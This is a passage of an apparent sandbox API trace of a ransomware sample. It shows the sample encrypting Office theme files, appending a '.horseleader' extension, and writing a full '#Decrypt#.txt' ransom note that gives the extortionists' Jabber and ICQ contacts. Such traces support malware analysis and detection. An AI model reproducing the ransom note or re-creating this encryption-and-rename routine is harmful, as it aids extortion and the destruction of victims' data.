nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.996] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.996] CloseHandle (hObject=0x1a4) returned 1 [0247.996] GetProcessHeap () returned 0x780000 [0247.997] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.997] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.horseleader") returned 90 [0247.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.horseleader")) returned 1 [0247.998] GetProcessHeap () returned 0x780000 [0247.998] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.998] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28535900, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5aad71f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x28535900, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xd59f, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SONORA.ELM", cAlternateFileName="")) returned 1 [0247.998] lstrcmpiW (lpString1="SONORA.ELM", lpString2="Windows") returned -1 [0247.998] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM") returned 77 [0247.998] StrStrIW (lpFirst="SONORA.ELM", lpSrch=".horseleader") returned 0x0 [0247.998] lstrcmpW (lpString1="SONORA.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.998] lstrcmpW (lpString1="SONORA.ELM", lpString2="_uninstalling_.png") returned 1 [0247.998] lstrlenW (lpString=".testttjffg") returned 11 [0247.998] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM", lpSrch=".testttjffg") returned 0x0 [0247.998] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.998] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.000] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM") returned 77 [0248.000] StrStrW (lpFirst="SONORA.ELM", lpSrch=".txt") returned 0x0 [0248.000] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=54687) returned 1 [0248.000] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.002] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.002] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.004] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.004] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.005] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x359f, lpOverlapped=0x0) returned 1 [0248.005] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffca61, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x359f, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x359f, lpOverlapped=0x0) returned 1 [0248.005] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.005] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.006] CloseHandle (hObject=0x1a4) returned 1 [0248.006] GetProcessHeap () returned 0x780000 [0248.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.006] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM.horseleader") returned 89 [0248.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.elm.horseleader")) returned 1 [0248.009] GetProcessHeap () returned 0x780000 [0248.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.009] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5aad71f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1e4, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SONORA.INF", cAlternateFileName="")) returned 1 [0248.009] lstrcmpiW (lpString1="SONORA.INF", lpString2="Windows") returned -1 [0248.009] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF") returned 77 [0248.009] StrStrIW (lpFirst="SONORA.INF", lpSrch=".horseleader") returned 0x0 [0248.009] lstrcmpW (lpString1="SONORA.INF", lpString2="#Decrypt#.txt") returned 1 [0248.009] lstrcmpW (lpString1="SONORA.INF", lpString2="_uninstalling_.png") returned 1 [0248.009] lstrlenW (lpString=".testttjffg") returned 11 [0248.009] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF", lpSrch=".testttjffg") returned 0x0 [0248.009] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.009] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.010] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF") returned 77 [0248.010] StrStrW (lpFirst="SONORA.INF", lpSrch=".txt") returned 0x0 [0248.010] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=484) returned 1 [0248.010] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1e4, lpOverlapped=0x0) returned 1 [0248.011] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.012] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1e4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1e4, lpOverlapped=0x0) returned 1 [0248.012] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.012] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.012] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.012] CloseHandle (hObject=0x1a4) returned 1 [0248.012] GetProcessHeap () returned 0x780000 [0248.012] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.012] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF.horseleader") returned 89 [0248.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\sonora.inf.horseleader")) returned 1 [0248.014] GetProcessHeap () returned 0x780000 [0248.014] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.014] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5534, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.014] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.014] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 79 [0248.014] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.014] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.014] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.014] lstrlenW (lpString=".testttjffg") returned 11 [0248.014] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.014] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.014] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.014] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.015] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 79 [0248.015] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.015] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=21812) returned 1 [0248.015] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.018] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.018] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.019] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x534, lpOverlapped=0x0) returned 1 [0248.019] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffacc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.019] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x534, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x534, lpOverlapped=0x0) returned 1 [0248.019] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.019] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.019] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.020] CloseHandle (hObject=0x1a4) returned 1 [0248.020] GetProcessHeap () returned 0x780000 [0248.020] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.020] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.horseleader") returned 91 [0248.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\thmbnail.png.horseleader")) returned 1 [0248.021] GetProcessHeap () returned 0x780000 [0248.021] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.021] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x5534, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0248.021] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.021] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\#Decrypt#.txt") returned 80 [0248.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.022] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.022] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.023] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.023] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.023] CloseHandle (hObject=0x158) returned 1 [0248.023] GetProcessHeap () returned 0x780000 [0248.023] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.023] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SPRING", cAlternateFileName="")) returned 1 [0248.023] lstrcmpiW (lpString1="SPRING", lpString2="Windows") returned -1 [0248.023] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING") returned 66 [0248.023] lstrcmpW (lpString1="SPRING", lpString2=".") returned 1 [0248.023] lstrcmpW (lpString1="SPRING", lpString2="..") returned 1 [0248.024] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.024] GetProcessHeap () returned 0x780000 [0248.024] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*") returned 68 [0248.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d4d5410, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.024] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.024] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\.") returned 68 [0248.024] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0248.024] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d4d5410, ftLastAccessTime.dwHighDateTime=0x1d301bf, 